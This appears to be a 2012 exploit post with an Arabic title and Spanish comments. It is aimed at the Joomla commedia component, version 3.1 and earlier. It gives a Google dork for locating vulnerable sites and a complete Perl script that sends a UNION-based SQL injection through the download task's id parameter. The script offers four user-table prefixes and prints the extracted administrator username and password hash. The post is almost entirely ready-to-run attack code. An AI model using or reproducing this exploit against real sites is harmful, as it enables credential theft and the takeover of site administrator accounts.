ثـغرة بـ: جوملا بلغة البيرل Joomla commedia Remote Exploit

 
 dork: inurl:index.php?option=com_commedia 
 
 Date: [18-10-2012] 
 
 Author: Daniel Barragan "D4NB4R" 
 
 Twitter: @D4NB4R 
 
 Vendor: http://www.ecolora.org/ 
 
 Version: 3.1 (last update on Oct 7, 2012) and lowers 
 
 License: Commercial and Non-Commercial, affects 2 versions 
 
 Demo: http://www.ecolora.org/index.php/demo/commedia 
 
 Download: http://ecolora.com/index.php/programmy/file/5-plagin-mp3browser-dlya-muzykalnykh-satov-na-joomla-15 
 
 Tested on: [Linux(bt5)-Windows(7ultimate)] 
 
 Especial greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt 
 
 
Descripcion:  
 
Commedia - a component and content plugin that allows you to create a content table containing all of the MP3's that are present in any directory of your site, a FTP-server (folder, single path to ftp-file) or a HTTP(S)-server (DROPBOX, folder, single path to http-file or http-radio). 
 
 
Exploit:  
 
#!/usr/bin/perl -w 
    ######################################## 
    # Joomla Component (commedia) Remote SQL Exploit 
    #----------------------------------------------------------------------------# 
    ######################################## 
    print "\t\t\n\n"; 
print "\t\n"; 
print "\t            Daniel Barragan  D4NB4R                \n"; 
print "\t                                                   \n"; 
print "\t      Joomla com_commedia Remote Sql Exploit \n"; 
print "\t\n\n"; 
print "                   :::Opciones de prefijo tabla users:::\n\n"; 
print "    1.  jos_users  2.  jml_users  3.  muc_users  4.  sgj_users  \n\n\n"; 
 
use LWP::UserAgent; 
use HTTP::Request; 
use LWP::Simple; 
 
print ":::Opcion::: "; 
my $option=<STDIN>; 
if ($option==1){&jos_users} 
if ($option==2){&jml_users} 
if ($option==3){&muc_users} 
if ($option==4){&sgj_users} 
 
 
sub jos_users { 
 
 
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; 
 
 
chomp(my $target=<STDIN>); 
 
    #the username of  joomla 
    $user="username"; 
    #the pasword of  joomla 
    $pass="password"; 
    #the tables of joomla 
    $table="jos_users"; 



    $d4n="com_commedia&format"; 
    $parametro="down&pid=59&id"; 
 
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; 
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); 
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; 
    $res = $b->request(HTTP::Request->new(GET=>$host)); 
    $answer = $res->content; 
 
    if ($answer =~ /<user>(.*?)<user>/){ 
            print "\nLos Datos Extraidos son:\n"; 
      print "\n 
 
* Admin User : $1"; 
 
    } 
 
    if ($answer =~/<pass>(.*?)<pass>/){print "\n 
 
* Admin Hash : $1\n\n"; 
 
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";} 
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";} 
} 
 
sub jml_users { 
 
 
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; 
 
 
chomp(my $target=<STDIN>); 
 
    #the username of  joomla 
    $user="username"; 
    #the pasword of  joomla 
    $pass="password"; 
    #the tables of joomla 
    $table="jml_users"; 
    $d4n="com_commedia&format"; 
    $parametro="down&pid=59&id"; 
 
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; 
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); 
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; 
    $res = $b->request(HTTP::Request->new(GET=>$host)); 
    $answer = $res->content; 
 
    if ($answer =~ /<user>(.*?)<user>/){ 
            print "\nLos Datos Extraidos son:\n"; 
      print "\n 
 
* Admin User : $1"; 
 
    } 
 
    if ($answer =~/<pass>(.*?)<pass>/){print "\n 
 
* Admin Hash : $1\n\n"; 
 
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";} 
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";} 
} 
 
sub muc_users { 
 
 
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; 
 
 
chomp(my $target=<STDIN>); 
 
    #the username of  joomla 
    $user="username"; 
    #the pasword of  joomla 
    $pass="password"; 
    #the tables of joomla 
    $table="muc_users"; 
    $d4n="com_commedia&format"; 
    $parametro="down&pid=59&id"; 
 
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; 
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); 
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; 
    $res = $b->request(HTTP::Request->new(GET=>$host)); 
    $answer = $res->content; 
 
    if ($answer =~ /<user>(.*?)<user>/){ 
            print "\nLos Datos Extraidos son:\n"; 
      print "\n 
 
* Admin User : $1"; 
 
    } 
 
    if ($answer =~/<pass>(.*?)<pass>/){print "\n 
 
* Admin Hash : $1\n\n"; 
 
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";} 
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";} 
} 
 
sub sgj_users { 
 
 
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; 
 
 
chomp(my $target=<STDIN>); 
 
    #the username of  joomla 
    $user="username"; 
    #the pasword of  joomla 
    $pass="password"; 
    #the tables of joomla 
    $table="sgj_users"; 
    $d4n="com_commedia&format"; 
    $parametro="down&pid=59&id"; 
 
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; 
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); 
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; 
    $res = $b->request(HTTP::Request->new(GET=>$host)); 
    $answer = $res->content; 
 
    if ($answer =~ /<user>(.*?)<user>/){ 
            print "\nLos Datos Extraidos son:\n"; 
      print "\n 
 
* Admin User : $1"; 
 
    } 
 
    if ($answer =~/<pass>(.*?)<pass>/){print "\n 
 
* Admin Hash : $1\n\n"; 
 
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";} 
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";} 
} 
 
 
_____________________________________________________ 
Daniel Barragan "D4NB4R" 2012